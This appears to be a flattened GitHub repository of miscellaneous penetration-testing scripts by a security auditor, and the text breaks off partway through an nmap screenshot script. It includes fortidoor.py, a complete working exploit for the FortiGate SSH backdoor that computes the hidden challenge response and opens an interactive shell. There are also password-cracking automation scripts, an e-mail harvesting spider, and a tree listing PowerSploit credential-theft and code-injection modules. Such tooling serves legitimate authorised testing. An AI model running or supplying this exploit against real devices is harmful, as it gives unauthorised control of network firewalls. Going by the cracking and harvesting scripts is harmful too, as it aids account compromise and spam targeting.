├── .gitignore ├── .gitmodules ├── README.md ├── check-smb-signing.sh ├── csv_merge.py ├── delldrac.py ├── docker_cleanup.sh ├── email_crawler.py ├── ettercap.py ├── exploits ├── fortidoor.py └── openmanage.py ├── externalIP.sh ├── fastnetntlm.py ├── find_local_admin.py ├── hashconvert.py ├── hlmcrack.sh ├── ike-scan.py ├── iker.py ├── john.py ├── kali_cgroup_fix.sh ├── mssql_brute.py ├── nmap_merge.py ├── nmap_to_html.sh ├── nse ├── http-email-harvest.nse ├── http-screenshot.nse ├── rtsp-screenshot.nse ├── vnc-screenshot.nse └── x11-screenshot.nse ├── office2hashcat.py ├── parse_nessus_xml.v24.pl ├── pdf2hashcat.py ├── powershell ├── AD-Reporting.ps1 ├── AD_user_security_report.ps1 ├── Dashimo-ADDashboard.ps1 ├── GPOCompare.ps1 ├── GPOReports.ps1 ├── Invoke-MetasploitPayload │ ├── Invoke-MetasploitPayload.ps1 │ ├── LICENSE │ ├── README.md │ ├── invoke-metasploitpayload.rc │ └── web_delivery_screenshot.png ├── NessusPro_v7_Report_Exporter_Tool.ps1 ├── New-ADAssetReport.ps1 ├── PowerSploit │ ├── .gitignore │ ├── AntivirusBypass │ │ ├── AntivirusBypass.psd1 │ │ ├── AntivirusBypass.psm1 │ │ ├── Find-AVSignature.ps1 │ │ └── Usage.md │ ├── CodeExecution │ │ ├── CodeExecution.psd1 │ │ ├── CodeExecution.psm1 │ │ ├── Invoke-DllInjection.ps1 │ │ ├── Invoke-ReflectivePEInjection.ps1 │ │ ├── Invoke-ReflectivePEInjection_Resources │ │ │ ├── DemoDLL │ │ │ │ ├── DemoDLL.sln │ │ │ │ └── DemoDLL │ │ │ │ │ ├── DemoDLL.cpp │ │ │ │ │ ├── DemoDLL.h │ │ │ │ │ ├── DemoDLL.vcxproj │ │ │ │ │ ├── DemoDLL.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── dllmain.cpp │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ ├── DemoDLL_RemoteProcess │ │ │ │ ├── DemoDLL_RemoteProcess.sln │ │ │ │ └── DemoDLL_RemoteProcess │ │ │ │ │ ├── DemoDLL_RemoteProcess.cpp │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── dllmain.cpp │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ ├── DemoExe │ │ │ │ ├── DemoExe.sln │ │ │ │ ├── DemoExe_MD │ │ │ │ │ ├── DemoExe_MD.cpp │ │ │ │ │ ├── DemoExe_MD.vcxproj │ │ │ │ │ ├── DemoExe_MD.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ │ └── DemoExe_MDd │ │ │ │ │ ├── DemoExe_MDd.cpp │ │ │ │ │ ├── DemoExe_MDd.vcxproj │ │ │ │ │ ├── DemoExe_MDd.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ ├── ExeToInjectInTo │ │ │ │ ├── ExeToInjectInTo.sln │ │ │ │ └── ExeToInjectInTo │ │ │ │ │ ├── ExeToInjectInTo.cpp │ │ │ │ │ ├── ExeToInjectInTo.vcxproj │ │ │ │ │ ├── ExeToInjectInTo.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ └── Shellcode │ │ │ │ ├── readme.txt │ │ │ │ ├── x64 │ │ │ │ ├── CallDllMain.asm │ │ │ │ ├── ExitThread.asm │ │ │ │ ├── GetFuncAddress.asm │ │ │ │ └── LoadLibraryA.asm │ │ │ │ └── x86 │ │ │ │ ├── CallDllMain.asm │ │ │ │ ├── ExitThread.asm │ │ │ │ └── GetProcAddress.asm │ │ ├── Invoke-Shellcode.ps1 │ │ ├── Invoke-WmiCommand.ps1 │ │ └── Usage.md │ ├── Exfiltration │ │ ├── Exfiltration.psd1 │ │ ├── Exfiltration.psm1 │ │ ├── Get-GPPAutologon.ps1 │ │ ├── Get-GPPPassword.ps1 │ │ ├── Get-Keystrokes.ps1 │ │ ├── Get-MicrophoneAudio.ps1 │ │ ├── Get-TimedScreenshot.ps1 │ │ ├── Get-VaultCredential.ps1 │ │ ├── Get-VaultCredential.ps1xml │ │ ├── Invoke-CredentialInjection.ps1 │ │ ├── Invoke-Mimikatz.ps1 │ │ ├── Invoke-NinjaCopy.ps1 │ │ ├── Invoke-TokenManipulation.ps1 │ │ ├── LogonUser │ │ │ └── LogonUser │ │ │ │ ├── LogonUser.sln │ │ │ │ ├── LogonUser │ │ │ │ ├── LogonUser.cpp │ │ │ │ ├── LogonUser.vcxproj │ │ │ │ ├── LogonUser.vcxproj.filters │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ │ │ └── logon │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── dllmain.cpp │ │ │ │ ├── logon.cpp │ │ │ │ ├── logon.vcxproj │ │ │ │ ├── logon.vcxproj.filters │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ ├── NTFSParser │ │ │ ├── NTFSParser.sln │ │ │ ├── NTFSParser │ │ │ │ ├── NTFS.h │ │ │ │ ├── NTFSParser.cpp │ │ │ │ ├── NTFSParser.vcxproj │ │ │ │ ├── NTFSParser.vcxproj.filters │ │ │ │ ├── NTFS_Attribute.h │ │ │ │ ├── NTFS_Common.h │ │ │ │ ├── NTFS_DataType.h │ │ │ │ ├── NTFS_FileRecord.h │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ │ └── NTFSParserDLL │ │ │ │ ├── NTFS.h │ │ │ │ ├── NTFSParserDLL.cpp │ │ │ │ ├── NTFSParserDLL.vcxproj │ │ │ │ ├── NTFSParserDLL.vcxproj.filters │ │ │ │ ├── NTFS_Attribute.h │ │ │ │ ├── NTFS_Common.h │ │ │ │ ├── NTFS_DataType.h │ │ │ │ ├── NTFS_FileRecord.h │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── dllmain.cpp │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ ├── Out-Minidump.ps1 │ │ ├── Usage.md │ │ └── VolumeShadowCopyTools.ps1 │ ├── LICENSE │ ├── Mayhem │ │ ├── Mayhem.psd1 │ │ ├── Mayhem.psm1 │ │ └── Usage.md │ ├── Persistence │ │ ├── Persistence.psd1 │ │ ├── Persistence.psm1 │ │ └── Usage.md │ ├── PowerSploit.psd1 │ ├── PowerSploit.psm1 │ ├── PowerSploit.pssproj │ ├── PowerSploit.sln │ ├── Privesc │ │ ├── Get-System.ps1 │ │ ├── PowerUp.ps1 │ │ ├── Privesc.psd1 │ │ ├── Privesc.psm1 │ │ └── README.md │ ├── README.md │ ├── Recon │ │ ├── Dictionaries │ │ │ ├── admin.txt │ │ │ ├── generic.txt │ │ │ └── sharepoint.txt │ │ ├── Get-ComputerDetail.ps1 │ │ ├── Get-HttpStatus.ps1 │ │ ├── Invoke-CompareAttributesForClass.ps1 │ │ ├── Invoke-Portscan.ps1 │ │ ├── Invoke-ReverseDnsLookup.ps1 │ │ ├── PowerView.ps1 │ │ ├── README.md │ │ ├── Recon.psd1 │ │ └── Recon.psm1 │ ├── ScriptModification │ │ ├── Out-CompressedDll.ps1 │ │ ├── Out-EncodedCommand.ps1 │ │ ├── Out-EncryptedScript.ps1 │ │ ├── Remove-Comment.ps1 │ │ ├── ScriptModification.psd1 │ │ ├── ScriptModification.psm1 │ │ └── Usage.md │ ├── Tests │ │ ├── CodeExecution.tests.ps1 │ │ ├── Exfiltration.tests.ps1 │ │ ├── PowerSploit.tests.ps1 │ │ ├── Privesc.tests.ps1 │ │ └── Recon.tests.ps1 │ ├── docs │ │ ├── AntivirusBypass │ │ │ └── Find-AVSignature.md │ │ ├── CodeExecution │ │ │ ├── Invoke-DllInjection.md │ │ │ ├── Invoke-ReflectivePEInjection.md │ │ │ ├── Invoke-Shellcode.md │ │ │ └── Invoke-WmiCommand.md │ │ ├── Mayhem │ │ │ ├── Set-CriticalProcess.md │ │ │ └── Set-MasterBootRecord.md │ │ ├── Persistence │ │ │ ├── Add-Persistence.md │ │ │ ├── Get-SecurityPackage.md │ │ │ ├── Install-SSP.md │ │ │ ├── New-ElevatedPersistenceOption.md │ │ │ └── New-UserPersistenceOption.md │ │ ├── Privesc │ │ │ ├── Add-ServiceDacl.md │ │ │ ├── Enable-Privilege.md │ │ │ ├── Find-PathDLLHijack.md │ │ │ ├── Find-ProcessDLLHijack.md │ │ │ ├── Get-ApplicationHost.md │ │ │ ├── Get-CachedGPPPassword.md │ │ │ ├── Get-ModifiablePath.md │ │ │ ├── Get-ModifiableRegistryAutoRun.md │ │ │ ├── Get-ModifiableScheduledTaskFile.md │ │ │ ├── Get-ModifiableService.md │ │ │ ├── Get-ModifiableServiceFile.md │ │ │ ├── Get-ProcessTokenGroup.md │ │ │ ├── Get-ProcessTokenPrivilege.md │ │ │ ├── Get-RegistryAlwaysInstallElevated.md │ │ │ ├── Get-RegistryAutoLogon.md │ │ │ ├── Get-ServiceDetail.md │ │ │ ├── Get-SiteListPassword.md │ │ │ ├── Get-System.md │ │ │ ├── Get-UnattendedInstallFile.md │ │ │ ├── Get-UnquotedService.md │ │ │ ├── Get-WebConfig.md │ │ │ ├── Install-ServiceBinary.md │ │ │ ├── Invoke-PrivescAudit.md │ │ │ ├── Invoke-ServiceAbuse.md │ │ │ ├── Invoke-WScriptUACBypass.md │ │ │ ├── Restore-ServiceBinary.md │ │ │ ├── Set-ServiceBinaryPath.md │ │ │ ├── Test-ServiceDaclPermission.md │ │ │ ├── Write-HijackDll.md │ │ │ ├── Write-ServiceBinary.md │ │ │ ├── Write-UserAddMSI.md │ │ │ └── index.md │ │ ├── Recon │ │ │ ├── Add-DomainGroupMember.md │ │ │ ├── Add-DomainObjectAcl.md │ │ │ ├── Add-RemoteConnection.md │ │ │ ├── Convert-ADName.md │ │ │ ├── ConvertFrom-SID.md │ │ │ ├── ConvertFrom-UACValue.md │ │ │ ├── ConvertTo-SID.md │ │ │ ├── Export-PowerViewCSV.md │ │ │ ├── Find-DomainLocalGroupMember.md │ │ │ ├── Find-DomainObjectPropertyOutlier.md │ │ │ ├── Find-DomainProcess.md │ │ │ ├── Find-DomainShare.md │ │ │ ├── Find-DomainUserEvent.md │ │ │ ├── Find-DomainUserLocation.md │ │ │ ├── Find-InterestingDomainAcl.md │ │ │ ├── Find-InterestingDomainShareFile.md │ │ │ ├── Find-InterestingFile.md │ │ │ ├── Find-LocalAdminAccess.md │ │ │ ├── Get-ComputerDetail.md │ │ │ ├── Get-Domain.md │ │ │ ├── Get-DomainComputer.md │ │ │ ├── Get-DomainController.md │ │ │ ├── Get-DomainDFSShare.md │ │ │ ├── Get-DomainDNSRecord.md │ │ │ ├── Get-DomainDNSZone.md │ │ │ ├── Get-DomainFileServer.md │ │ │ ├── Get-DomainForeignGroupMember.md │ │ │ ├── Get-DomainForeignUser.md │ │ │ ├── Get-DomainGPO.md │ │ │ ├── Get-DomainGPOComputerLocalGroupMapping.md │ │ │ ├── Get-DomainGPOLocalGroup.md │ │ │ ├── Get-DomainGPOUserLocalGroupMapping.md │ │ │ ├── Get-DomainGroup.md │ │ │ ├── Get-DomainGroupMember.md │ │ │ ├── Get-DomainManagedSecurityGroup.md │ │ │ ├── Get-DomainOU.md │ │ │ ├── Get-DomainObject.md │ │ │ ├── Get-DomainObjectAcl.md │ │ │ ├── Get-DomainPolicy.md │ │ │ ├── Get-DomainSID.md │ │ │ ├── Get-DomainSPNTicket.md │ │ │ ├── Get-DomainSite.md │ │ │ ├── Get-DomainSubnet.md │ │ │ ├── Get-DomainTrust.md │ │ │ ├── Get-DomainTrustMapping.md │ │ │ ├── Get-DomainUser.md │ │ │ ├── Get-DomainUserEvent.md │ │ │ ├── Get-Forest.md │ │ │ ├── Get-ForestDomain.md │ │ │ ├── Get-ForestGlobalCatalog.md │ │ │ ├── Get-ForestTrust.md │ │ │ ├── Get-HttpStatus.md │ │ │ ├── Get-NetComputerSiteName.md │ │ │ ├── Get-NetLocalGroup.md │ │ │ ├── Get-NetLocalGroupMember.md │ │ │ ├── Get-NetLoggedon.md │ │ │ ├── Get-NetRDPSession.md │ │ │ ├── Get-NetSession.md │ │ │ ├── Get-NetShare.md │ │ │ ├── Get-PathAcl.md │ │ │ ├── Get-RegLoggedOn.md │ │ │ ├── Get-WMIProcess.md │ │ │ ├── Get-WMIRegCachedRDPConnection.md │ │ │ ├── Get-WMIRegLastLoggedOn.md │ │ │ ├── Get-WMIRegMountedDrive.md │ │ │ ├── Get-WMIRegProxy.md │ │ │ ├── Invoke-Kerberoast.md │ │ │ ├── Invoke-Portscan.md │ │ │ ├── Invoke-ReverseDnsLookup.md │ │ │ ├── Invoke-RevertToSelf.md │ │ │ ├── Invoke-UserImpersonation.md │ │ │ ├── New-DomainGroup.md │ │ │ ├── New-DomainUser.md │ │ │ ├── Remove-RemoteConnection.md │ │ │ ├── Resolve-IPAddress.md │ │ │ ├── Set-DomainObject.md │ │ │ ├── Set-DomainObjectOwner.md │ │ │ ├── Set-DomainUserPassword.md │ │ │ ├── Test-AdminAccess.md │ │ │ └── index.md │ │ ├── ScriptModification │ │ │ ├── Out-CompressedDll.md │ │ │ ├── Out-EncodedCommand.md │ │ │ ├── Out-EncryptedScript.md │ │ │ └── Remove-Comment.md │ │ └── index.md │ └── mkdocs.yml ├── adwcleaner.ps1 ├── export_AD_groups.ps1 ├── export_AD_users.ps1 ├── export_all_GPO_reports.ps1 ├── get_windows_updates.ps1 └── gpresult.ps1 ├── shellcode2exe.py ├── smtp_rst.py ├── smtp_vrfy.py ├── update_docker_images.sh ├── update_git_repos.sh └── upgrade_pip_packages.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .project 2 | .pydevproject 3 | /.externalToolBuilders 4 | *.tmp 5 | .DS_Store 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | scripts 2 | ======= 3 | 4 | Miscellaneous scripts for penetration testing 5 | 6 | ------------------------------------------------------------------------------- 7 | 8 | Matthew C. Jones, CPA, CISA, OSCP 9 | 10 | IS Audits and Consulting, LLC - 11 | 12 | TJS Deemer Dana - 13 | 14 | ------------------------------------------------------------------------------- 15 | 16 | A handful of these scripts were authored by others and may or may not contain 17 | modifications. 18 | 19 | Copyright info and credits have been maintained where applicable. 20 | 21 | The following collections are included as subtrees: 22 | - https://github.com/averagesecurityguy/scripts 23 | - https://github.com/danielbohannon/Invoke-Obfuscation 24 | - https://github.com/artkond/Invoke-Vnc 25 | - https://github.com/putterpanda/mimikittenz 26 | - https://github.com/PowerShellMafia/PowerSploit 27 | - https://github.com/xorrior/RandomPS-Scripts 28 | - https://github.com/fireeye/SessionGopher 29 | - https://github.com/l0ss/Grouper 30 | - https://github.com/A-mIn3/WINspect 31 | - https://github.com/phillips321/adaudit 32 | - https://github.com/alanrenouf/Windows-Workstation-and-Server-Audit 33 | - https://github.com/TheSecEng/NessusParser-Excel 34 | 35 | ------------------------------------------------------------------------------- 36 | 37 | When not otherwise specified, scripts are licensed under GPL: 38 | 39 | This program is free software: you can redistribute it and/or modify it under 40 | the terms of the GNU General Public License as published by the Free Software 41 | Foundation, either version 3 of the License, or (at your option) any later 42 | version. 43 | 44 | This program is distributed in the hope that it will be useful, but WITHOUT ANY 45 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A 46 | PARTICULAR PURPOSE. See the GNU General Public License for more details. 47 | 48 | You should have received a copy of the GNU General Public License along with 49 | this program. If not, see . -------------------------------------------------------------------------------- /csv_merge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | @author: Matthew C. Jones, CPA, CISA, OSCP 4 | IS Audits & Consulting, LLC 5 | TJS Deemer Dana LLP 6 | 7 | Merge multiple CSV files into a single output file with only one header row 8 | NOTE - ALL FILES MUST HAVE SAME HEADER / FORMAT TO WORK PROPERLY 9 | 10 | See README.md for licensing information and credits 11 | 12 | ''' 13 | 14 | import argparse 15 | import os 16 | import glob 17 | 18 | def main(): 19 | 20 | #------------------------------------------------------------------------------ 21 | # Configure Argparse to handle command line arguments 22 | #------------------------------------------------------------------------------ 23 | desc = "Merge multiple CSV files into a single output file" 24 | 25 | parser = argparse.ArgumentParser(description=desc) 26 | parser.add_argument('input_folder', action='store', nargs='?', 27 | help='Directory containing CSV files to merge \n \ 28 | (defaults to working directory if none specified)' 29 | ) 30 | args = parser.parse_args() 31 | 32 | input_folder = args.input_folder 33 | 34 | 35 | #------------------------------------------------------------------------------ 36 | # Main stuff 37 | #------------------------------------------------------------------------------ 38 | 39 | if not input_folder: 40 | input_folder = os.getcwd() 41 | print 'no directory specified - using working directory:' 42 | print input_folder 43 | print '' 44 | 45 | merge_csv(input_folder) 46 | 47 | 48 | def merge_csv(input_folder): 49 | 50 | csv_files = glob.glob(os.path.join(input_folder,"*.csv")) 51 | output_file = os.path.join(input_folder, "merged.csv") 52 | 53 | header_saved = False 54 | with open(output_file,'wb') as fout: 55 | for filename in csv_files: 56 | with open(filename) as fin: 57 | header = next(fin) 58 | if not header_saved: 59 | fout.write(header) 60 | header_saved = True 61 | for line in fin: 62 | fout.write(line) 63 | 64 | if __name__ == '__main__': 65 | main() -------------------------------------------------------------------------------- /exploits/fortidoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 4 | # Usage: ./fgt_ssh_backdoor.py 5 | 6 | import socket 7 | import select 8 | import sys 9 | import paramiko 10 | from paramiko.py3compat import u 11 | import base64 12 | import hashlib 13 | import termios 14 | import tty 15 | 16 | def custom_handler(title, instructions, prompt_list): 17 | n = prompt_list[0][0] 18 | m = hashlib.sha1() 19 | m.update('\x00' * 12) 20 | m.update(n + 'FGTAbc11*xy+Qqz27') 21 | m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70') 22 | h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest()) 23 | return [h] 24 | 25 | 26 | def main(): 27 | if len(sys.argv) < 2: 28 | print 'Usage: ' + sys.argv[0] + ' ' 29 | exit(-1) 30 | 31 | client = paramiko.SSHClient() 32 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 33 | 34 | try: 35 | client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False) 36 | except paramiko.ssh_exception.SSHException: 37 | pass 38 | 39 | trans = client.get_transport() 40 | try: 41 | trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) 42 | except paramiko.ssh_exception.AuthenticationException: 43 | pass 44 | 45 | trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler) 46 | chan = client.invoke_shell() 47 | 48 | oldtty = termios.tcgetattr(sys.stdin) 49 | try: 50 | tty.setraw(sys.stdin.fileno()) 51 | tty.setcbreak(sys.stdin.fileno()) 52 | chan.settimeout(0.0) 53 | 54 | while True: 55 | r, w, e = select.select([chan, sys.stdin], [], []) 56 | if chan in r: 57 | try: 58 | x = u(chan.recv(1024)) 59 | if len(x) == 0: 60 | sys.stdout.write('\r\n*** EOF\r\n') 61 | break 62 | sys.stdout.write(x) 63 | sys.stdout.flush() 64 | except socket.timeout: 65 | pass 66 | if sys.stdin in r: 67 | x = sys.stdin.read(1) 68 | if len(x) == 0: 69 | break 70 | chan.send(x) 71 | 72 | finally: 73 | termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty) 74 | 75 | 76 | if __name__ == '__main__': 77 | main() 78 | -------------------------------------------------------------------------------- /externalIP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo Your external IP Address is: 4 | wget wget -O - -q icanhazip.com 5 | 6 | exit 0 7 | -------------------------------------------------------------------------------- /hlmcrack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Built for Kali 4 | # 5 | # This tool will use rcrack to perform the full cracking process of a Half LM Hash. 6 | # 7 | # 8 | # Usage: ./hlmcrack.sh hlmhashes.txt 9 | # 10 | # By: Leon Teale (RandomStorm) 11 | # 12 | 13 | #Set path to your half lm tables 14 | hlmtable=/opt/tables/rcracki_mt/Halflm_tables_all-space 15 | 16 | 17 | 18 | #Check usage 19 | if [ -z "$1" ]; 20 | then 21 | echo "Usage: ./hlmcrack.sh john_netntlm.txt" 22 | 23 | else 24 | 25 | for line in `cat $1 | sort -u`; do 26 | 27 | echo "$line" > /tmp/newhash.txt 28 | hash="$line" 29 | username="`echo $line | cut -d : -f 1`" 30 | seedhash="`echo $line | cut -d : -f 4 | sed 's/\(.\{16\}\).*/\1/'`" 31 | echo $hash 32 | echo $username 33 | echo $seedhash 34 | 35 | #Get the seed (the first 16 digits of the hash) 36 | /usr/bin/rcracki_mt -h $seedhash $hlmtable > /tmp/seed.tmp 37 | 38 | seed=`cat /tmp/seed.tmp | grep "plaintext of" | awk {'print ($NF)'}` 39 | 40 | #Crack the remaining hash 41 | perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --seed $seed --file /tmp/newhash.txt 1> /dev/null 42 | perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --file /tmp/newhash.txt | grep "($username)" 2> /dev/null >> /tmp/hlmcrack.txt 43 | 44 | done 45 | fi 46 | 47 | #Printed Output 48 | clear 49 | echo "#################################################################################" 50 | echo "Half LM cracked: cracked `cat /tmp/hlmcrack.txt | wc -l`\\`cat $1 | wc -l`" 51 | echo "" 52 | cat /tmp/hlmcrack.txt 53 | echo "" 54 | echo "#################################################################################" 55 | rm /tmp/hlmcrack.txt 56 | rm /tmp/newhash.txt 57 | rm /tmp/seed.tmp -------------------------------------------------------------------------------- /john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | @author: Matthew C. Jones, CPA, CISA, OSCP 4 | IS Audits & Consulting, LLC 5 | TJS Deemer Dana LLP 6 | 7 | Automation script for running a series of transforms in John The Ripper against 8 | a password hash file. 9 | 10 | Acceptable inputs include pwdump and metasploit (eg. netntlmv2) 11 | ''' 12 | import sys 13 | import argparse 14 | import subprocess 15 | import shutil 16 | 17 | def cleanup_routine(): 18 | '''Cleanup old files and processes''' 19 | 20 | try: 21 | # Delete old temp files if the user wants to; default to leave old files 22 | response = raw_input("\nDelete old JTR session data (enter no if you want to keep old hashes, etc)? [no]") 23 | if "y" in response or "Y" in response: 24 | print("Deleting temp files...\n") 25 | shutil.rmtree("~/.john", True) 26 | else: 27 | pass 28 | 29 | except: 30 | pass 31 | 32 | 33 | def main(argv): 34 | 35 | parser = argparse.ArgumentParser(description='Automation script for JTR hash cracking.') 36 | parser.add_argument("infile", action="store", help="Input file containing hashes") 37 | parser.add_argument("--hashtype", "--t", action="store", help='Optional hash type (lm, nt, netntlmv2; defaults to nt)') 38 | args = parser.parse_args() 39 | 40 | inputfile = args.infile 41 | hashtype = args.hashtype 42 | wordlistdir = "~/hacking/dictionaries/" 43 | 44 | if hashtype == None: 45 | hashtype="nt" 46 | 47 | print "cleaning old JTR sessions" 48 | 49 | subprocess.Popen("john --single --format="+hashtype+" " + inputfile, shell=True).wait() 50 | subprocess.Popen("john --wordlist="+wordlistdir+"wordlists/numbers.txt --rules --format="+hashtype+" " + inputfile, shell=True).wait() 51 | subprocess.Popen("john --wordlist="+wordlistdir+"wordlists/names.txt --rules --format="+hashtype+" " + inputfile, shell=True).wait() 52 | subprocess.Popen("john --wordlist="+wordlistdir+"combined_all_unix.txt --rules --format="+hashtype+" " + inputfile, shell=True).wait() 53 | 54 | subprocess.Popen("john --wordlist="+wordlistdir+"combined_wordlists_unix.txt --rules=single --format="+hashtype+" " + inputfile, shell=True).wait() 55 | 56 | subprocess.Popen("john --show --format="+hashtype+" " + inputfile + "| cut -d: -f1,2", shell=True).wait() 57 | 58 | if __name__ == "__main__": 59 | main(sys.argv[1:]) 60 | -------------------------------------------------------------------------------- /kali_cgroup_fix.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Kali - fix "cgroup mmountpoint does not exist" when launching Docker 4 | 5 | sudo mkdir /sys/fs/cgroup/systemd 6 | 7 | sudo mount -t cgroup -o none,name=systemd cgroup /sys/fs/cgroup/systemd -------------------------------------------------------------------------------- /nmap_to_html.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ $# == 0 ]; then 4 | echo "Usage: $0 /path/to/nmap/xml/output" 5 | exit 0 6 | fi 7 | 8 | FILES=$1 9 | 10 | #do not process *.xml if there are no xml files in directory 11 | shopt -s nullglob 12 | 13 | for f in $FILES*.xml 14 | do 15 | # take action on each file. $f store current file name 16 | xsltproc "$f" -o "$f.html" 17 | done 18 | -------------------------------------------------------------------------------- /nse/http-email-harvest.nse: -------------------------------------------------------------------------------- 1 | local httpspider = require "httpspider" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local table = require "table" 5 | 6 | description = [[ 7 | Spiders a web site and collects e-mail addresses. 8 | ]] 9 | 10 | --- 11 | -- @usage 12 | -- nmap --script=http-email-harvest 13 | -- 14 | -- @output 15 | -- PORT STATE SERVICE REASON 16 | -- 80/tcp open http syn-ack 17 | -- | http-email-harvest: 18 | -- | Spidering limited to: maxdepth=3; maxpagecount=20 19 | -- | root@examplec.com 20 | -- |_ postmaster@example.com 21 | -- 22 | -- @args http-email-harvest.maxdepth the maximum amount of directories beneath 23 | -- the initial url to spider. A negative value disables the limit. 24 | -- (default: 3) 25 | -- @args http-email-harvest.maxpagecount the maximum amount of pages to visit. 26 | -- A negative value disables the limit (default: 20) 27 | -- @args http-email-harvest.url the url to start spidering. This is a URL 28 | -- relative to the scanned host eg. /default.html (default: /) 29 | -- @args http-email-harvest.withinhost only spider URLs within the same host. 30 | -- (default: true) 31 | -- @args http-email-harvest.withindomain only spider URLs within the same 32 | -- domain. This widens the scope from withinhost and can 33 | -- not be used in combination. (default: false) 34 | -- 35 | 36 | author = "Patrik Karlsson" 37 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 38 | categories = {"discovery", "safe"} 39 | 40 | 41 | portrule = shortport.http 42 | 43 | function action(host, port) 44 | local EMAIL_PATTERN = "[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?" 45 | 46 | local crawler = httpspider.Crawler:new(host, port, nil, { 47 | scriptname = SCRIPT_NAME 48 | } 49 | ) 50 | 51 | if ( not(crawler) ) then 52 | return 53 | end 54 | crawler:set_timeout(10000) 55 | 56 | local emails = {} 57 | while(true) do 58 | local status, r = crawler:crawl() 59 | -- if the crawler fails it can be due to a number of different reasons 60 | -- most of them are "legitimate" and should not be reason to abort 61 | if ( not(status) ) then 62 | if ( r.err ) then 63 | return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) 64 | else 65 | break 66 | end 67 | end 68 | 69 | -- Collect each e-mail address and build a unique index of them 70 | for email in r.response.body:gmatch(EMAIL_PATTERN) do 71 | emails[email] = true 72 | end 73 | end 74 | 75 | -- if no email addresses were collected abort 76 | if ( not(emails) ) then return end 77 | 78 | local results = {} 79 | for email, _ in pairs(emails) do 80 | table.insert(results, email) 81 | end 82 | 83 | results.name = crawler:getLimitations() 84 | 85 | return stdnse.format_output(true, results) 86 | end 87 | -------------------------------------------------------------------------------- /nse/http-screenshot.nse: -------------------------------------------------------------------------------- 1 | -- This file is part of IVRE. 2 | -- Copyright 2011 - 2016 Pierre LALET 3 | -- 4 | -- IVRE is free software: you can redistribute it and/or modify it 5 | -- under the terms of the GNU General Public License as published by 6 | -- the Free Software Foundation, either version 3 of the License, or 7 | -- (at your option) any later version. 8 | -- 9 | -- IVRE is distributed in the hope that it will be useful, but WITHOUT 10 | -- ANY WARRANTY; without even the implied warranty of MERCHANTABILITY 11 | -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public 12 | -- License for more details. 13 | -- 14 | -- You should have received a copy of the GNU General Public License 15 | -- along with IVRE. If not, see . 16 | 17 | local shortport = require "shortport" 18 | local string = require "string" 19 | local stdnse = require "stdnse" 20 | 21 | description = [[ 22 | 23 | Gets a screenshot from a Web service using a simple phantomjs script. 24 | 25 | The script ivre-http-screenshot.js must me installed somewhere in 26 | $PATH, as well as phantomjs. 27 | 28 | Adapted from the http-screenshot script by SpiderLabs, that uses 29 | wkhtmltoimage. 30 | 31 | The output of the script is similar to the one from SpiderLabs, so 32 | that both can be used with IVRE. 33 | 34 | ]] 35 | 36 | author = "Pierre LALET " 37 | license = "GPLv3" 38 | categories = {"discovery", "safe", "screenshot"} 39 | 40 | --- 41 | -- @usage 42 | -- nmap -n -p 80 --script http-screenshot www.google.com 43 | -- 44 | -- @args http-screenshot.vhost the vhost to use (default: use the 45 | -- provided hostname or IP address) 46 | -- @args http-screenshot.timeout timeout for the phantomjs script 47 | -- (default: 300s) 48 | -- 49 | -- @output 50 | -- PORT STATE 